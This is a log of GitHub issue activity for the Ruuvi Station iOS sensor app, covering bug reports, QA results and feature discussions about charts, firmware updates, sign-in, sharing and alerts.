[2022-03-21 09:01] markoaamunkajo commented on #794
@priyonto Ah my bad yes I see it's working correctly on correct version and iPhone7

[2022-03-21 09:26] priyonto commented on #794
Then I think we can close this one?
The point to note is - devices with no default mail app settings will always open the iOS default mail app if it's installed, if not then will show that popup.

[2022-03-21 09:27] markoaamunkajo commented on #794
Closing

[2022-03-21 09:27] #794 closed

[2022-03-22 10:37] priyonto opened #807 "Setup Github actions for CI and CD"

[2022-03-22 13:05] JussiKui commented on #725
I have tried to sync 4 different Ruuvitags and none of them syncs after ~2 days

[2022-03-23 09:02] ojousima commented on #487
When this is completed, let's update the feedback topic here as [Completed] https://feedback.ruuvi.com/posts/84/in-progress-one-page-overview

[2022-03-29 00:45] markoaamunkajo opened #813 "Force capital letters for Ruuvi Cloud signin code"
Description:

Ruuvi Cloud signin code is in capital format, let's force keyboard as capitals on iOS signin for this.

[2022-03-29 00:50] markoaamunkajo opened #814 "Remove icon and measurement from sensor card page if sensor doesn't exist"
Description:

When user has RuuviTag with less sensors, show only the existing ones on sensor card page.
Icons: humidity, air pressure, movement.
Align remaining icons downwards on the page.

Card for Android: https://github.com/ruuvi/com.ruuvi.station/issues/641

[2022-03-29 01:06] markoaamunkajo opened #815 "Add unit detail for movement icon"
Description:

Add unit detail for movement icon on sensor card (currently only has icon).
Unit: movements

Web already uses string "times" which will be renamed.

<img width="352" alt="Screenshot 2022-03-29 at 8 04 35" src="https://user-images.githubusercontent.com/50437378/160511915-ab0a1f43-c29a-4909-9d88-fa53beba4816.png">

Card for Android: https://github.com/ruuvi/com.ruuvi.station/issues/642

[2022-03-29 01:15] markoaamunkajo opened #816 "(Unification) Ruuvi Cloud: change code text field to code boxes"
Description:

Let's use code boxes for signin on Ruuvi Cloud signin page.
Basically copy the design that is used on Web.

Important: no OK button, when code filled should submit

<img width="362" alt="Screenshot 2022-03-29 at 8 13 06" src="https://user-images.githubusercontent.com/50437378/160512902-f70dfab8-7fb9-41d7-a871-3b1053b52755.png">

Card for Android: https://github.com/ruuvi/com.ruuvi.st

[2022-03-29 02:43] markoaamunkajo opened #817 "Onboarding: Ruuvi Cloud"
Description:

Please add Ruuvi Cloud page to Onboarding screens after Set Alerts and before Let's Get Started.

![ruuvi-cloud-design](https://user-images.githubusercontent.com/50437378/160521150-052b71f9-be06-4c69-bb06-dc64a9ea8336.jpg)

"Sign in" button opens Ruuvi Cloud sign in. When user completed sign in user will be forwarded to Let's Get Started page.

"Details" button will open popup with t

[2022-03-29 03:00] markoaamunkajo opened #818 "Menu item: Get Ruuvi Gateway"
Description:

Add link under Get More Sensors

Link: https://ruuvi.com/gateway

[2022-03-29 03:03] markoaamunkajo opened #819 "Hide alert setting when sensor doesn't exist"
Description:

Some RuuviTags don't have specific sensors.
Please hide Alert in Sensor Settings if sensor doesn't exist.

[2022-03-29 03:08] markoaamunkajo opened #820 "(Unification) Use popup for editing Name in Sensor Settings"
Description:

Show pencil icon on name field (same as in Web)
Use popup for editing Name

Please use same string as on Android:
"Your sensors will be in alphabetical order."

[2022-03-29 09:25] priyonto commented on #533
Closing this one as duplicate of #750

[2022-03-29 09:25] #533 closed

[2022-03-30 00:25] markoaamunkajo commented on #538
QA passed

[2022-03-30 00:25] #538 closed

[2022-03-30 00:35] markoaamunkajo commented on #679
1.0.0(262)
The firmware update process seems to be successful until I get shown this screen and the whole app is stuck here.

![IMG_8402](https://user-images.githubusercontent.com/50437378/160727922-94a88733-4868-416e-abb6-7faa20406329.PNG)

[2022-03-30 00:40] markoaamunkajo commented on #754
QA passed

[2022-03-30 00:40] #754 closed

[2022-03-30 00:48] markoaamunkajo opened #821 "Chart curve is behaving badly"
1.0.0(262)

Chart library curve smoothing is behaving badly.

![IMG_8404](https://user-images.githubusercontent.com/50437378/160728927-efd7197f-3ec9-4870-96f0-0c63971b5b92.PNG)
[Xmax_20220330-0738.csv](https://github.com/ruuvi/com.ruuvi.station.ios/files/8375852/Xmax_20220330-0738.csv)

In this case the datapoints are correctly apart but for some reason chart was drawn awkwardly. Let's disable thi

[2022-03-30 01:25] markoaamunkajo opened #822 "Landscape chart: remove active area for zooming on date/time"
Description:

User is scrolling and zooming charts in landscape mode. If he's swiping too slowly on top of date/time area he will zoom in chart instead of moving to next/previous chart.

Let's fix it by removing active area on top of date/time so user will be able to navigate between charts when touching this area.
![IMG_8407](https://user-images.githubusercontent.com/50437378/160732182-c252e3ab-5

[2022-03-30 01:32] markoaamunkajo opened #823 "Don't allow user to go to claim page when ownership is not his"
Description:

User adds new sensor to Ruuvi Station and tries to claim ownership, he gets error that sensor is already owned by xxx***@xx**.com
On Sensor Settings page he is still able to go to Claim Ownership page.

Expected:
When email is shown as hashed don't let user to Claim Ownership page.
![IMG_583A777F59EF-1](https://user-images.githubusercontent.com/50437378/160732962-f8550ac9-3c23-476e-8

[2022-03-30 03:01] markoaamunkajo opened #824 "Firmware update instructions update"
Description:

New Firmware update strings have been updated to localization repo. Notice there is now 6 improved instruction strings.

prepare_your_sensor_instructions_1
prepare_your_sensor_instructions_2
prepare_your_sensor_instructions_3
prepare_your_sensor_instructions_4
prepare_your_sensor_instructions_5
prepare_your_sensor_instructions_6

https://github.com/ruuvi/station.localization/pull/90

[2022-03-30 03:18] laurijamsa commented on #824
Let's add an image to help finding the button. Image location should be on above all the texts including "Prepare your sensor" title.

A zip file including transparent PNG (too large file to include in the app package) and a JPG (~300kB). You can also scale down resolution of the JPG if needed but make sure that it doesn't look blurry. When adding the image, make sure it's not too large on landsca

[2022-03-30 06:27] JussiKui commented on #725
Same "BTKit: failed to serve in desired interval" error

[2022-03-31 10:22] priyonto opened #827 "Unify chart downsampling behaviour with android app"
Base discussion:
https://github.com/ruuvi/com.ruuvi.station/issues/369

[2022-04-02 22:09] priyonto commented on #531
The issue from the title is fixed.  And, the issues on the edit already have separate cards - #725 & #317

[2022-04-03 17:21] priyonto commented on #679
@markoaamunkajo

This popup is not configured to show on this page at all. I am wondering how this is visible in the firmware update screen.
Would you please share the steps to reproduce this? Also, from which firmware you are trying to update? 2.5.9 DF 3?

I have tried to update several times on my side with 2.5.9 DF3, and DF5 to the latest one and could not reproduce it yet.

[2022-04-05 02:18] markoaamunkajo commented on #679
Now I had full success with update and sensor update was completed with sensor card updated correctly.
QA passed

[2022-04-05 02:18] #679 closed

[2022-04-05 02:21] markoaamunkajo opened #833 "1.0.0(271) GATT sync is telling me Bluetooth is off"
Description:
Clean install, added couple of local BT sensors

This build version is telling me when trying to GATT sync on charts page that Bluetooth is switched off. It happens on all sensor cards.

https://user-images.githubusercontent.com/50437378/161666384-a08ea66b-c7b8-4baa-8dec-c16e3d3baa74.MP4

[2022-04-05 02:24] markoaamunkajo commented on #531
QA passed

[2022-04-05 02:24] #531 closed

[2022-04-05 02:28] markoaamunkajo commented on #750
QA passed

[2022-04-05 02:28] #750 closed

[2022-04-05 02:29] markoaamunkajo commented on #821
QA passed

[2022-04-05 02:29] #821 closed

[2022-04-05 02:32] markoaamunkajo commented on #205
QA passed

[2022-04-05 02:32] #205 closed

[2022-04-05 05:29] priyonto commented on #833
Thank you for the feedback. I think I know why is this happening. Looking into it.

[2022-04-05 08:37] priyonto commented on #725
We are investigating this issue. Thank you for your feedback.

[2022-04-05 08:50] priyonto commented on #491
![IMG_4D5F31F44126-1](https://user-images.githubusercontent.com/24395776/161716601-74ceaf0b-b4c6-4304-ae37-765e36021c51.jpeg)

@markoaamunkajoI think this is already available on the current version of the app?

[2022-04-05 09:15] markoaamunkajo opened #836 "Warn user before FW update if his battery level is low"
Description:

Some simple logic could be used because we know temperature of the battery

if temp is less than -20C, low battery threshold = 2V
else if temp is less than 0C, low battery threshold = 2,3V
else low battery threshold = 2,5V

Was done on Android side with card: https://github.com/ruuvi/com.ruuvi.station/issues/538

[2022-04-05 09:16] markoaamunkajo commented on #411
Agreed in the meeting that improving logic in this case is not needed. Closing this card.

[2022-04-05 09:16] #411 closed

[2022-04-05 09:44] priyonto commented on #755
Metrics are not visible on the dashboard. Rechecking needed.

[2022-04-05 10:17] markoaamunkajo commented on #833
QA passed

[2022-04-05 10:17] #833 closed

[2022-04-05 10:23] markoaamunkajo commented on #824
1.0.0(273)

Instruction lines are ending with  ...
Landscape mode image is on title text

![IMG_2FBEADE0B906-1](https://user-images.githubusercontent.com/50437378/161733555-9bc020c6-cd06-4c4a-a80a-3f1281f33c5c.jpeg)
![IMG_2870](https://user-images.githubusercontent.com/50437378/161733582-dd196919-69f4-4212-918e-5cbea24de159.PNG)

[2022-04-05 10:25] markoaamunkajo commented on #491
Yes, this is completed

[2022-04-05 10:25] #491 closed

[2022-04-05 10:36] priyonto commented on #824
@markoaamunkajo Thank you for the feedback. Which device is this?

[2022-04-05 10:37] markoaamunkajo commented on #173
I cannot replicate. Something seems off with this sensor @DG12 I see only one calibration setting for humidity, app would show calibration for all available sensors onboard.

[2022-04-05 10:37] #173 closed

[2022-04-05 10:40] markoaamunkajo commented on #371
Cannot replicate, closing

[2022-04-05 10:40] #371 closed

[2022-04-05 10:43] markoaamunkajo commented on #741
Correct, these issues seem solved to me. Closing card.

[2022-04-05 10:43] #741 closed

[2022-04-05 10:46] markoaamunkajo commented on #824
@priyonto It's iPhone 6s Plus OS 15.4

[2022-04-05 10:55] markoaamunkajo commented on #753
@priyonto 1.0.0(273)

Not at all optimal behavior on iPhone 6S Plus OS 15.4

![IMG_CB9CA2A7E9F1-1](https://user-images.githubusercontent.com/50437378/161738633-7261bf67-56f7-4aa4-a3e2-f87a3172f8a1.jpeg)

https://user-images.githubusercontent.com/50437378/161738668-637a94b9-9af3-4fec-90a1-42685cf5eb32.mov

[2022-04-05 10:56] laurijamsa commented on #824
I have updated the PCB image. Find it here and scale down the resolution so that app package won't grow too much:

[updated-images-remember-to-scale-down.zip](https://github.com/ruuvi/com.ruuvi.station.ios/files/8417366/updated-images-remember-to-scale-down.zip)

[2022-04-06 01:31] markoaamunkajo commented on #824
QA passed

[2022-04-06 01:31] #824 closed

[2022-04-06 01:34] markoaamunkajo commented on #753
QA passed

[2022-04-06 01:34] #753 closed

[2022-04-07 15:37] priyonto commented on #732
I think we should retain the send button as it is and execute the share action on return could raise cases where the user accidentally tapped return and did not mean to share just yet.

https://user-images.githubusercontent.com/24395776/162236449-3a3513ee-49a7-466b-96b9-b0d9733719d2.MP4

This is the approach I suggest -
When the keyboard is open the screen will be scrolled to the bottom so that al

[2022-04-07 21:21] DG12 commented on #173
I cannot duplicate this issue at this time. Should it re-occur, I will re-open or and new issue.

[2022-04-08 12:04] DG12 commented on #741
This ruuvi  6e29 has a broken(?) BME280 and advertises:

7FFF for temp and 0000 for air pressure

version 1.0.0(278)
Please reopen this issue
![Ruuvi 6E29 bad values](https://user-images.githubusercontent.com/2365961/162431181-e8d43322-74b3-406b-9fed-7d98b4804c04.png)
e

[2022-04-09 10:16] laurijamsa commented on #741
If a sensor advertises 00000 as air pressure, it is a valid value. Also 7FFF for temp is a valid reading.

See: https://docs.ruuvi.com/communication/bluetooth-advertisements/data-format-5-rawv2

[2022-04-09 16:04] DG12 opened #858 "Attempt to share with owner : internal error 1.1.0(280)"
Mistakenly attempted to share with owner causes
Error
Internal error
OK
![ShareWithOwner](https://user-images.githubusercontent.com/2365961/162581898-d301f8d3-1e1f-427c-beb8-a8a1fbff0cec.PNG)

[2022-04-09 16:22] DG12 opened #859 "Successfully shared should say "share email sent""
When "Add **a** friend "
Response is currently
Successfully
shared sensor
OK
![ShareSuccessNOT](https://user-images.githubusercontent.com/2365961/162582555-135db251-1522-479a-8913-f5bb0b02b8e0.PNG)

This is not true, especially if the friends email is spelled incorrectly .

Message should be something like "Email share offer has been sent"

[2022-04-09 16:31] DG12 opened #860 "Attempt to share : Error ...need... Gateway..."
A sensor that is in the cloud database, but currently not in range should be able to be shared.

![SharedNeedsGateway](https://user-images.githubusercontent.com/2365961/162582725-9080a56a-29a6-4ce1-ac54-6c06421ec52d.PNG)

[2022-04-09 22:12] DG12 opened #861 "Sensor usually out of range of station, not within range of gateway now displays nothing 1.1.0(280)"
Swamp 22AB is within range of the station only about 15 minutes one a week.
Previously station displayed the most recent data, including the graph.
As of version 1.1.0(280)  now displays:

_F

And no recent values for battery's,y,z ...

This may be due to the fact that firebase required deinstall of app and data before installing new version.

cloud query reports:
"result": "success",
    "data":

[2022-04-09 22:17] DG12 commented on #861
![22AB_nodata](https://user-images.githubusercontent.com/2365961/162593277-78af7a9e-d3f2-42be-b7e9-dae901bc9e89.PNG)
![22AB_Fonly](https://user-images.githubusercontent.com/2365961/162593278-8e827a07-1eed-4394-8724-f5489f4bd033.PNG)
![22AB_nograph](https://user-images.githubusercontent.com/2365961/162593279-559874a6-7ad7-43a6-938c-2fb11aaf0644.PNG)

[2022-04-10 15:23] DG12 commented on #732
Looks good now.

[2022-04-10 15:23] #732 closed

[2022-04-10 15:33] DG12 commented on #741
Even if a (broken) sensor sends values outside or real-world reasonable values, station should ignore them, otherwise credibility is lost on other values and other ruuvis.

FYI
"Lowest non-tornadic atmospheric pressure ever measured was 870 hPa (0.858 atm; 25.69 inHg)
highest was 1083.8mb = hPa (32.00 inHg) at Agata, Siberia, Russia (alt. 262m , 862ft) corresponds to being at 600 m (2,000 ft) belo

[2022-04-11 00:42] laurijamsa commented on #741
I dont't agree that it would be client app's job to limit the measurement scale that we have specified in the datasheet. If a sensor is broken, it should broadcast "not defined" like the dataformat specification states.

However, seems that in some rare cases like yours, the firmware application didn't manage to know if the IC chip sensor was ok or not. And in this case it didn't return not define

[2022-04-11 03:32] markoaamunkajo commented on #815
@priyonto Fixed unnecessary capitalization for French https://github.com/ruuvi/station.localization/pull/95
When this merged can move to done

[2022-04-11 03:34] markoaamunkajo commented on #814
QA passed

[2022-04-11 03:34] #814 closed

[2022-04-11 03:36] markoaamunkajo commented on #818
QA passed

[2022-04-11 03:36] #818 closed

[2022-04-11 03:37] markoaamunkajo commented on #819
QA passed

[2022-04-11 03:37] #819 closed

[2022-04-11 03:39] markoaamunkajo commented on #402
QA passed

[2022-04-11 03:39] #402 closed

[2022-04-11 04:24] markoaamunkajo commented on #317
1.1.0(280)

Let's fix minor inconsistencies @priyonto

1. GATT Sync ending screen reports Disconnected before success message and it's on top of other items.
![IMG_8462](https://user-images.githubusercontent.com/50437378/162664618-91c552c4-f694-4a4d-bc38-4864f280e883.PNG)

2. On Android GATT sync fetches full data on first sync and then only adds new data on consecutive syncs. Full sync is only do

[2022-04-11 04:34] markoaamunkajo commented on #823
QA passed

[2022-04-11 04:34] #823 closed

[2022-04-11 04:35] markoaamunkajo commented on #836
QA passed

[2022-04-11 04:35] #836 closed

[2022-04-11 14:23] priyonto commented on #815
@markoaamunkajo  Done merging, and will be affected on the next build. Closing this one.

[2022-04-11 14:23] #815 closed

[2022-04-11 19:03] priyonto commented on #859
I think this actually makes things even vague. When the share email is sent the sensor is already shared by then with the user. It is not an offer to accept, it is more of an authorization.

[2022-04-12 02:52] #317 closed, assigned to nobody

[2022-04-12 02:53] markoaamunkajo commented on #485
QA passed

[2022-04-12 02:53] #485 closed

[2022-04-12 02:55] markoaamunkajo commented on #820
QA passed

[2022-04-12 09:10] laurijamsa commented on #859
We have plans to enhance the sharing procedure by asking sharee to accept the sensor before it will be actually shared. But for now, we can keep the original string because the sensor is shared instantly. Closing.

Related issue: https://github.com/ruuvi/ruuvi-network-serverless/issues/149

[2022-04-12 11:54] DG12 commented on #860
What is the reason for prohibiting sharing after not being able to share, currently inactive, Ruuvi.

Consider scenario: sensor active for several months, now out of battery or otherwise out of range, user wants associate to view data from month ago.

[2022-04-13 21:43] priyonto commented on #813
Covered in card #869

[2022-04-14 03:02] laurijamsa commented on #860
Reason for this decision originally was that if a sensor has no data in the cloud, it would be a bad user experience when someone receives a shared sensor without data. And if no data in the cloud, it would mean in most cases that owner of the sensor has no Ruuvi Gateway and he/she tries to share an offline sensor which is not . But for sure some edge cases like yours could benefit an option to sh

[2022-04-16 11:22] markoaamunkajo commented on #817
1.1.0 (282) @priyonto

1. Details popup text is hopelessly small to read on my iPhone7 and sad old eyes. Let's make font bigger maybe try +2 and see if it still fits on iPhone SE screen

2. There should be new language string used specifically for button Sign in, since button is small and here we could use separate more correct and shorter string. Current: "Kirjaudu sisään" New: "Kirjaudu"

3. FI

[2022-04-16 11:31] markoaamunkajo commented on #816
QA passed

[2022-04-16 11:31] #816 closed

[2022-04-16 11:35] markoaamunkajo commented on #817
@priyonto  One more thing we have overlooked. When user already signed in but he decides to skip back pages on onboarding the sign in button should be a sign out button and user would be able to restart signin process.

[2022-04-16 11:40] priyonto commented on #817
Thank you for all the feedbacks. However, if user taps on sign out what will happen? Should we show any popup for sign out or just sign out the user and show sign in button?

Right now on the iOS app after user sign in, the sign in button is hidden.

[2022-04-16 11:41] markoaamunkajo commented on #813
QA passed

[2022-04-16 11:41] #813 closed

[2022-04-16 11:43] markoaamunkajo commented on #817
@priyonto we should use same process as when choosing main menu item "sign out", which shows confirmation popup and removes sensor cards if user chooses "OK".

[2022-04-16 11:46] priyonto commented on #817
@markoaamunkajo This is noted. That's going to add quite some work. 😅

[2022-04-16 11:51] markoaamunkajo commented on #175
@laurijamsa looks like platform specific to use checkmarks, maybe this can be left alone?

[2022-04-16 11:51] #175 closed

[2022-04-16 11:57] markoaamunkajo commented on #822
1.1.0(282) @priyonto See attached video. User is zooming in in chart in landscape mode and at some point he wants to touch the time/date area to skip to next chart but he is stuck because he is doing it too slow.

https://user-images.githubusercontent.com/50437378/163673982-af580896-1b20-498a-9d60-ecd6c564d46f.mov

[2022-04-16 13:29] andreevdenis commented on #817
@markoaamunkajo I don't like this idea. This is really strange UI/UX for onboarding.

[2022-04-16 13:32] priyonto commented on #817
I somewhat agree with this. This seems a lot for the onboarding.

[2022-04-16 13:36] andreevdenis commented on #817
Maybe it will be better to hide buttons if user already signed in and show text: "Great! You already signed in!"

[2022-04-16 13:39] priyonto commented on #817
I kept the details button now but hide the sign in button. But this sounds like a good plan to me.

[2022-04-16 13:41] markoaamunkajo commented on #817
"Great! You already signed in!" let's do this, easy and straightforward @andreevdenis @priyonto

[2022-04-16 13:41] priyonto commented on #817
Should we also hide the "Details" button too?

[2022-04-16 13:42] markoaamunkajo commented on #817
It's fine no need to hide.

[2022-04-16 13:44] priyonto commented on #817
Also, where should we show the message?

[2022-04-16 13:47] markoaamunkajo commented on #817
I think replace the texts is probably best

[2022-04-16 13:49] priyonto commented on #817
I was also thinking the same. But, probably we should hide both of the texts and just show the text: "Great! You already signed in!"

[2022-04-16 13:51] markoaamunkajo commented on #817
Lets go with showing the top text and replacing bottom text and see how it looks like, I think this likely gives idea what to do on the page and informs user that this is done already.

[2022-04-16 13:53] priyonto commented on #817
Sure. Let's see how it turns out.

[2022-04-18 07:55] priyonto commented on #822
@markoaamunkajo Thank you for the report. Yes, I was able to reproduce it. But, I am unsure whether this can be fixed anytime soon or at all. The reason is -

When a chart for a sensor is zoomed vertically that's basically creating a scenario where one scrollView(the sensor chart) is embedded on another scrollView(the one has all three charts). And, the main scrollView does not work in that scenar

[2022-04-18 09:46] priyonto opened #873 "First card from the list doesn't update data until second card is visited"

[2022-04-18 14:24] markoaamunkajo commented on #873
Replicated iOS14.8 1.1.0(283), only first sensor card not updating even though it looks like synchronizing with cloud no new sensor data is fetched.

[2022-04-18 14:33] markoaamunkajo commented on #817
QA passed

[2022-04-18 14:33] #817 closed

[2022-04-18 21:10] DG12 commented on #175
Checkmarks look good.

If you wanted to go "unified"( across IOS, Android, Web) how about simply **bold**.

I think it's fine the way it is.

[2022-04-19 06:23] ojousima opened #879 "Add instructions for verifying build"
Users should be able to check their app .apk against automated builds, similar to https://core.telegram.org/reproducible-builds

[2022-04-19 09:27] markoaamunkajo commented on #822
@priyonto we discussed in the meeting to postpone this task together with Android. Will move this to backlog.
There will be another card regarding redesigning the charts view.

[2022-04-19 09:57] markoaamunkajo commented on #873
Discussed in dm, issue seems to persist in build 1.1.0(284) @priyonto

[2022-04-20 12:04] markoaamunkajo commented on #873
Discussed in dm, issue seems to persist in build 1.1.0(285) @priyonto

[2022-04-20 12:28] markoaamunkajo commented on #873
Ignore my previous comment. Discussed more on dm and it looks like Android and iOS behavior is very similar now. At least I don't see any single card update getting stuck.

[2022-04-20 12:28] #873 closed

[2022-04-22 04:02] laurijamsa opened #886 "Implement a battery capacity indicator"
Same description as on Android: https://github.com/ruuvi/com.ruuvi.station/issues/335

Let's finally implement this simple low battery indicator using the same logic we are using when updating the firmware, it's described here: #538

The message should be shown next to the voltage reading in the sensor settings page:

<img width="316" alt="image" src="https://user-images.githubusercontent.com/1311

[2022-04-25 23:15] DG12 commented on #165
Can this please be revisited?
I believe RSSI is stored in the database.

[2022-04-27 04:43] markoaamunkajo opened #887 "Calibrated values not shown on sensor page"
Description:

Ticket source: feedback email

Wondering if there is some sort of bug, since Ruuvi app doesn't show custom humidity on the sensor page, instead it's showing me the uncalibrated one. Looks like it's updating value to the calibrated one with few seconds delay and sometimes update doesn't happen at all. Charts view shows the readings correctly all the time.

(user has also Ruuvi Gateway

[2022-04-27 12:31] markoaamunkajo commented on #887
@priyonto
Tested with App store and Test Flight builds. Both are not updating calibrated values when Cloud Mode is on.

[2022-04-27 12:36] priyonto commented on #887
Thanks @markoaamunkajo. I will check into this tomorrow hopefully.

[2022-04-27 16:35] DG12 commented on #317
Great.

Interesting starts blinding fast then at about 800, it goes into "chunk " mode, updating ever few seconds.
Continuing like that for several seconds then returns 'blinding fast" mode
878,,921, 966,990, 1005,1035, 1065,1101,1125,11145,1679........,,.,,,,.,.,.,complete

Ruuvi is .5 meters away

[2022-04-27 23:27] DG12 opened #888 "No alarm although humidity is out of alert limit 1.1.0 (285)"
RUUVI_450A (notice underscore) has no alarm but
current temp: 72.9 , alert: 41---88
current humidity: 39.77, alert: 60--78  <<<<
AirPressure, RSSI & movement alerts off
update 2 s ago

Webui correctly shows humidity alarm as does android.

[2022-04-28 01:34] laurijamsa commented on #888
Meaning, humidity alerts are broken on 1.1.0 (285)? What about other alerts? Let's test this @markoaamunkajo

[2022-04-29 13:49] priyonto commented on #888
This one seems to be broken in earlier versions too, not only in the 1.1.0(285). The issue is spotted and a fix is on the way.

[2022-04-29 13:50] priyonto commented on #888
@DG12 When you say no alarm, does it mean when the humidity is under or above threshold you are not getting any email alert? Or the little warning beside the humidity is not showing?

[2022-04-29 14:51] priyonto commented on #888
Update: I have tested the alert and the email and local alert seems to be working as expected. But, I noticed the warning is not showing is not beside the humidity text. I have fixed on the above commit.

[2022-04-30 01:56] markoaamunkajo commented on #888
@priyonto Maybe this is the actual case: I previously had humidity units set to % and had alert going to my email. Then configured humidity units to dew point, went back to configure new alert but I still see alert showing % and I get humidity alert for % going to my email.

https://user-images.githubusercontent.com/50437378/166086051-ae430628-de51-4e60-8585-32dc8ef097a3.mov

Expected:
I should se

[2022-04-30 01:58] laurijamsa commented on #888
This is not correct because we don't support other than relative humidity alerts.

[2022-04-30 02:02] markoaamunkajo commented on #887
QA passed

[2022-04-30 02:02] #887 closed

[2022-04-30 02:04] markoaamunkajo commented on #888
Ahh I'm thinking about some prehistorical build, my bad.
Custom texts, alert emails and limits were checked, all good for me in this build. Moving to done.

[2022-04-30 02:43] DG12 opened #893 "Sign in: activation code error confusion 1.1.1(288) - nuisance"
request a code, shows
Sign in to Ruuvi Station

got distracted waiting for email,  after entered correct code , reports

Error
Unauthorized
+++++++++++++
Entered incorrect "**authorization code"**, reports:

**Token** is expired

PS expire time is toooo short :-(

See android issue [#684](https://github.com/ruuvi/com.ruuvi.station/issues/684)

[2022-04-30 02:57] DG12 commented on #888
Bell symbol did not blink
Need to check most recent version

[2022-04-30 12:23] DG12 commented on #888
I.e. bell symbol does not blink.
Emails received .

PS spamassassin added to the spam score just a little because:
"From and EnvelopeFrom 2nd level mail domains are different."

PPS is there an option for Appdistribution.firebase.google.com to retain data?
or did (288) require data to be deleted?

[2022-05-01 03:07] markoaamunkajo commented on #888
QA passed

[2022-05-01 03:07] #888 closed

[2022-05-02 08:47] priyonto opened #898 "Adding one tag making other tags undiscoverable - 1.0.0(278)"
- This issue has been reproduced. However, this is only occurring with DF3 tags.

[2022-05-03 22:25] DG12 opened #901 "Querying for firmware version doesn't always timeout - 1.1.1(291)- outlier"
230E, user not signed in,
Sensor Settings FIRMWARE
shows
Current Version bfb837c+default

tap update

Seems that station queries tag **again** and
![image](https://user-images.githubusercontent.com/2365961/166575863-73e87a2a-d47e-4fd8-b7f6-a6ae5d0baecc.png)

**SOMETIMES** (Every other time? +/- ?) gets hung spinnering
![image](https://user-images.githubusercontent.com/2365961/166575062-6e303659-b0

[2022-05-03 22:36] DG12 opened #902 "Sensor now out of range cannot alter alerts 1.1.1(291) defect"
Not signed in
While in range, set alert 450A alert range 47-89F
Now 46F

Alert.on slider is and range controls are disabled.
"Alarms are disabled because you are not connected to device." Why must I be connected to device?
![image](https://user-images.githubusercontent.com/2365961/166584306-378b84a8-b392-46e5-94d5-93cd5d0c0bf1.png)

[2022-05-04 08:13] priyonto commented on #901
When the firmware update page is opened the current version is fetched again from the bluetooth. The timeout period is 30 seconds. But, probably we can improve this experience by not fetching the firmware version while it's already fetched on the tag settings page.

[2022-05-04 08:39] priyonto opened #903 "Bluetooth connection alert triggering the alert continuously when tag is connected"
This issue was reported by a user and is reproducible in version 1.1.1(291)

Reproduce steps:
- Connect tag from tag settings screen
- Enable connection alert
- Move app to background or keep in the foreground

[2022-05-04 09:46] priyonto opened #904 "Unify analytics metrics with Android"

[2022-05-06 04:27] priyonto opened #905 "App freezes for 3-4 seconds when app is launched"
- Disabling the bluetooth fixes the issue.

[2022-05-06 05:15] laurijamsa commented on #905
User who reported this said that he suspects that the app gets too heavy load because he has 10 sensors updating from Ruuvi Cloud and additionally 10 Bluetooth sensors nearby the phone. Some loading event is not threaded properly, maybe.

[2022-05-06 07:09] priyonto commented on #905
I remember discussing this with @io53 on our channel. When sensors number increased we noticed glitches in synchronisation. We have an issue on that already #802 . We can close one of these as duplicates.

[2022-05-06 08:05] priyonto commented on #905
Closing as duplicate of #802

[2022-05-06 08:05] #905 closed

[2022-05-06 12:03] DG12 opened #906 "firmware update: doesn't report but said v3.28.0 1.1.1(291) - outlier"
EC0F Sensor Settings Current Version says v3.28.0 but
tap on update reports in 3 seconds
 "Your sensor doesn't report its current firmware version"

[2022-05-06 14:58] DG12 commented on #901
Somehow most sensors time out after   10(?) seconds but
230E , updating by advertisements ever few seconds, reports current Version v3.31.1
but doesn't time out after (at least ) 3 minutes .
tap go back,  tap update reports you are running the latest firmwareersion...
go back
tap update spinning spinning.

[2022-05-06 16:32] priyonto commented on #901
Noted, will investigate. Thank you.

[2022-05-09 13:22] priyonto commented on #903
The issue was able to be reproduced on the tags with firmware v3.29.0. And, v3.30/31 tags are working as expected in my testing.
Therefore, if any user is on firmware v3.29.0 it is highly recommended to update the firmware.

[2022-05-09 15:18] priyonto commented on #903
The discussion on this concluded with decision of observing how many users are using the connection alert first and then decide whether to improve it or remove it completely.

[2022-05-09 15:18] #903 closed

[2022-05-09 15:18] priyonto commented on #724
The discussion on this concluded with decision of observing how many users are using the connection alert first and then decide whether to improve it or remove it completely.

[2022-05-10 11:57] DG12 opened #908 "No new sensors in Bluetooth range - 1.1.1(291) - nit"
Add a New Sensor reports:

**(** No sensors on Bluetooth range **)**

Should be:

No **new** sensors **in** Bluetooth range.

+++++
**NEARBY** RUUVI SENSORS

should be (?)

**NEW** RUUVI SENSORS

[2022-05-12 05:52] laurijamsa commented on #599
Received a customer feedback:

"Miten saan poistettua aiemmin tekemäni näyttösivut eri antureille?
Olen yrittänyt ”Poista tämä anturi”- toiminnolla, mutta ei vaan toimi?
Timo

------------------------------------------
Device: iPhone 12 Pro
OS: iOS 15.4.1
App: Ruuvi Station 1.0.0(278)
Location: when in use
Photo Library: authorized
Camera: authorized
Notifications: authorized"

"How can I remove s

[2022-05-12 06:02] priyonto commented on #599
Is it possible to get more information on this? like firmware version and especially if it's df3 tag or other?

[2022-05-12 06:29] laurijamsa commented on #599
Not possible at least not yet. But is it really needed? User should always be able to remove sensors from the app, no matter what (old fw, uuid changed by the phone and therefore differentiating sensors not possible on df3, etc)

[2022-05-12 07:31] priyonto commented on #599
It's not really needed. When I made the last fix on this issue the tag removal part kept pretty straight forward, just check on the db and remove it, nothing else needed. I am wondering what could possibly stopping it from being removed. The reason of asking more info is I came across an issue where df3 tags were sometime causing issue while removing and adding back. But, that was also fixed long

[2022-05-12 08:08] laurijamsa commented on #599
One scenario that crossed my mind that may have happened is that RuuviTag is on DF3 (no MAC address in payload) and then user's phone has decided to change RuuviTag's UUID. And then 10 days passed and measurements from database got flushed.  And then when trying to remove the RuuviTag, an error occurs because no data in the database.

[2022-05-12 08:16] priyonto commented on #599
Thank you for the input. This might be a potential flaw. As far I can see the latest version is supporting these scenarios too while removing the tag. What I can confirm now - to remove tag it is not required to have BT connection, or in range. But, I will have to look into deeply I guess.

[2022-05-13 06:00] priyonto opened #909 "Offset corrected value is updated with next cloud sync or bluetooth measurement"
- Probably an improvement of updating it immediately will make the experience better.

[2022-05-13 22:00] DG12 opened #910 "Export filename only partial - 1.1.1 (291) nit"
Ruuvi BB12_20220513-1750.cvs

Should Be:
Ruuvi BB12 **water inlet**_20220513-1750.csv

[2022-05-13 22:04] DG12 opened #911 "Export voltage heading is "Voltage (V)" SB Voltage 1.1.1(291) - nit"
Android Is Voltage
IOS is   "Voltage (V)"
webui   Battery Voltage

Do all the text fields need to within quotes?
If they need quotes then android and IOS need fixing.

[2022-05-16 07:12] priyonto commented on #910
Could you please share more on this? preferably a screen record? I can see the export file contains the full name of the tag on the file in my testing. Thanks.

[2022-05-16 07:15] priyonto commented on #908
